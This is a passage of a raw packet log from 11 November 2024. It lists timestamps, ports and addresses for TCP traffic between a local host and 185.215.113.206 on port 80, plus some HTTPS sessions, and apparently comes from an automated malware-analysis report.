Nov 11, 2024 10:33:25.582736969 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582751036 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582762003 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582772970 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582782984 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582791090 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582792997 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582806110 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582808971 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582818985 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582825899 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582830906 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582844019 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582854986 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582863092 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582866907 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.582885981 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.582901001 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.586236954 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.587332964 CET	443	49841	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.620807886 CET	443	49842	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.621494055 CET	49842	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.621525049 CET	443	49842	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.622060061 CET	49842	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.622065067 CET	443	49842	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.625863075 CET	443	49845	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.626389980 CET	49845	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.626408100 CET	443	49845	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.626919985 CET	49845	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.626924038 CET	443	49845	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.636271000 CET	443	49846	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.636704922 CET	49846	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.636729956 CET	443	49846	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.636771917 CET	443	49844	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.636979103 CET	443	49843	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.637150049 CET	49846	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.637156963 CET	443	49846	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.637546062 CET	49844	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.637561083 CET	443	49844	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.637955904 CET	49843	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.637984037 CET	443	49843	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.638031960 CET	49844	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.638037920 CET	443	49844	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.638391018 CET	49843	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:25.638396978 CET	443	49843	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:25.657725096 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.657738924 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.657751083 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.657763004 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.657774925 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.657809973 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.657864094 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.657877922 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.657890081 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.657902002 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.657912970 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.657926083 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.657933950 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.657949924 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.657990932 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658020973 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658034086 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658051014 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658061981 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658066988 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658075094 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658088923 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658092022 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658099890 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658113003 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658129930 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658138990 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658157110 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658165932 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658169985 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658181906 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658193111 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658199072 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658206940 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658220053 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658222914 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658233881 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658246994 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658250093 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658260107 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658282995 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658294916 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658320904 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658322096 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658322096 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658338070 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658340931 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658349991 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658361912 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658373117 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658373117 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658384085 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658396006 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658402920 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658407927 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658416986 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658426046 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658432007 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658443928 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658456087 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658478975 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658488989 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658492088 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658538103 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658550024 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658556938 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658570051 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658580065 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658581018 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658591032 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658601046 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658607006 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658620119 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658621073 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658634901 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658644915 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658646107 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658657074 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658658981 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658672094 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658673048 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658684969 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658705950 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658715963 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658721924 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658735991 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658760071 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658770084 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658776999 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658785105 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658796072 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658807039 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658807993 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658821106 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658828974 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658834934 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658845901 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658857107 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658873081 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658883095 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658885956 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658910036 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658935070 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.658950090 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658961058 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658972025 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658986092 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658997059 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.658999920 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659009933 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659041882 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659068108 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659068108 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659084082 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659096956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659118891 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659136057 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659159899 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659162998 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659177065 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659193039 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659204960 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659216881 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659220934 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659229040 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659240007 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659245014 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659251928 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659264088 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659274101 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659297943 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659302950 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659336090 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659343958 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659354925 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659358978 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.659369946 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659384012 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.659393072 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659404039 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659410000 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659410000 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.659415960 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659429073 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659449100 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.659456015 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.659462929 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659472942 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659482956 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659482956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659482956 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659497976 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659509897 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659511089 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.659511089 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659524918 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659544945 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659553051 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659559965 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659571886 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659583092 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659590960 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659604073 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659606934 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659615993 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659617901 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659631968 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659637928 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659646988 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659658909 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659671068 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659673929 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659682989 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659683943 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659696102 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659707069 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659708977 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659719944 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659730911 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659759045 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659759045 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659778118 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659821987 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659835100 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659845114 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659857035 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659877062 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659888983 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659890890 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659902096 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659904003 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659904003 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659919024 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659929991 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659940004 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659950972 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659953117 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659965992 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659975052 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.659979105 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.659991026 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.660001993 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.660021067 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.660056114 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.660228968 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.660245895 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.660278082 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.660307884 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.660314083 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.660341024 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.660351992 CET	443	49831	13.107.246.40	192.168.2.5
Nov 11, 2024 10:33:25.660438061 CET	49831	443	192.168.2.5	13.107.246.40
Nov 11, 2024 10:33:25.660731077 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.660742044 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.660754919 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.660789967 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.660804033 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.660888910 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.660906076 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.660917044 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.660928965 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.660939932 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.660950899 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.660952091 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.660965919 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.660974979 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.660979033 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.660990000 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.660994053 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661006927 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661017895 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661020041 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661032915 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661046982 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661070108 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661071062 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661082983 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661093950 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661094904 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661108017 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661113024 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661114931 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661128998 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661139965 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661142111 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661154985 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661158085 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661166906 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661181927 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661186934 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661206007 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661214113 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661226034 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661227942 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661237955 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661248922 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661258936 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661261082 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661273956 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661277056 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661288977 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661298990 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661300898 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661317110 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661319971 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661329031 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661346912 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661370993 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661375999 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661384106 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661393881 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661406040 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661408901 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661421061 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661434889 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661446095 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661451101 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661458015 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661469936 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661477089 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661477089 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661484957 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661509991 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661525965 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661537886 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661540031 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661550045 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661565065 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661571980 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661582947 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661583900 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661597013 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661608934 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:25.661624908 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:25.661626101 CET	49747	80	192.168.2.5	185.215.113.206
